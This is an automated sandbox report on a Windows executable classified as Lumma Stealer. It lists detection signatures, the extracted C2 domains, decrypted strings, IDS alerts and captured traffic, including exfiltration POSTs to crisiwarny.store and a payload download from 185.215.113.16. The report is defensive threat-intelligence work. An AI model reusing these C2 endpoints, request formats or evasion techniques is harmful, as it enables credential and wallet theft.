Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1543581
MD5:65397ed2ae0567709b177f41d0668597
SHA1:1af8432aef5af0655dc6952fcbac893adae53880
SHA256:ba91baa187e8253acfb92cb60be2a1c99cb9809f4156475bd12a08e6fb69ed06
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 4936 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 65397ED2AE0567709B177F41D0668597)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["fadehairucw.store", "crisiwarny.store", "necklacedmny.store", "navygenerayk.store", "founpiuer.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store"], "Build id": "Kav--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 4936JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: file.exe PID: 4936JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: file.exe PID: 4936JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-28T07:18:26.832629+010020546531A Network Trojan was detected192.168.2.849705104.21.95.91443TCP
              2024-10-28T07:18:28.033097+010020546531A Network Trojan was detected192.168.2.849706104.21.95.91443TCP
              2024-10-28T07:18:41.233523+010020546531A Network Trojan was detected192.168.2.849713104.21.95.91443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-28T07:18:26.832629+010020498361A Network Trojan was detected192.168.2.849705104.21.95.91443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-28T07:18:28.033097+010020498121A Network Trojan was detected192.168.2.849706104.21.95.91443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-28T07:18:42.153886+010020197142Potentially Bad Traffic192.168.2.849717185.215.113.1680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-28T07:18:34.637074+010020480941Malware Command and Control Activity Detected192.168.2.849710104.21.95.91443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: file.exe.4936.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["fadehairucw.store", "crisiwarny.store", "necklacedmny.store", "navygenerayk.store", "founpiuer.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store"], "Build id": "Kav--"}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeJoe Sandbox ML: detected
              Source: file.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
              Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
              Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
              Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
              Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
              Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
              Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
              Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088D7F8 CryptUnprotectData,0_2_0088D7F8
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49713 version: TLS 1.2
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000002.1867159031.0000000000552000.00000040.00000001.01000000.00000006.sdmp, 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000003.1733973050.0000000004B70000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+75E07B5Ch]0_2_0087EC20
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_0088104F
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_008B4C40
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-42h]0_2_0087E1A0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_008AE210
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0000008Ah]0_2_0087CF90
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+6D44C030h]0_2_0089AB20
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9ABDB589h0_2_0089AB20
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_00875890
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6D44C02Ch]0_2_008AFC90
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_008814CE
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx+38h]0_2_0088E07E
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ebp+edx*4+00h], ax0_2_0087BD50
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]0_2_0087BD50
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00898290
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]0_2_008B3A90
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], bp0_2_00891EC5
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ecx], di0_2_00891EC5
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp edx0_2_00878EF0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then and esi, 001FF800h0_2_00874BA0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49710 -> 104.21.95.91:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49706 -> 104.21.95.91:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49705 -> 104.21.95.91:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.95.91:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 104.21.95.91:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49713 -> 104.21.95.91:443
              Source: Malware configuration extractorURLs: fadehairucw.store
              Source: Malware configuration extractorURLs: crisiwarny.store
              Source: Malware configuration extractorURLs: necklacedmny.store
              Source: Malware configuration extractorURLs: navygenerayk.store
              Source: Malware configuration extractorURLs: founpiuer.store
              Source: Malware configuration extractorURLs: presticitpo.store
              Source: Malware configuration extractorURLs: thumbystriw.store
              Source: Malware configuration extractorURLs: scriptyprefej.store
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 28 Oct 2024 06:18:42 GMTContent-Type: application/octet-streamContent-Length: 2869760Last-Modified: Mon, 28 Oct 2024 06:09:16 GMTConnection: keep-aliveETag: "671f2a8c-2bca00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2c 00 00 04 00 00 ab 54 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 61 69 73 79 67 77 67 78 00 80 2b 00 00 a0 00 00 00 6a 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 64 72 62 67 61 71 79 00 20 00 00 00 20 2c 00 00 04 00 00 00 a4 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2c 00 00 22 00 00 00 a8 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewIP Address: 104.21.95.91 104.21.95.91
              Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49717 -> 185.215.113.16:80
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12851Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15080Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20247Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569693Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
              Source: global trafficDNS traffic detected: DNS query: presticitpo.store
              Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
              Source: file.exe, file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
              Source: file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/U
              Source: file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/j
              Source: file.exe, file.exe, 00000000.00000002.1724361364.0000000000C7A000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724509005.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
              Source: file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe0
              Source: file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe2
              Source: file.exe, 00000000.00000002.1724509005.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000D90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeR
              Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
              Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
